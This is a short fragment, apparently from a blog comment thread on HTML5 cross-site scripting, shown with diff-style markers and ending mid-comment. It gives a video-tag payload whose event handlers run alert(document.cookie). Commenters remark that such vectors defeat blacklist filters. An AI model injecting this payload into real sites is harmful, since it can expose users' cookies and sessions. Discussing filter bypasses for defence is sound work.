HTML5 XSS

 <video src=”somevalidvideo” onloadedmetadata=”alert(document.cookie);” ondurationchanged=”alert(/XSS2/);” ontimeupdate=”alert(/XSS1/);”></video>

-5. Anne van Kesteren wrote:
+5. Anne van Kesteren writes:

 Both seem to rely on blacklists being used, which are a pretty bad idea for exactly this reason.

-6. eric su wrote:
+6. eric su writes:

 @cosine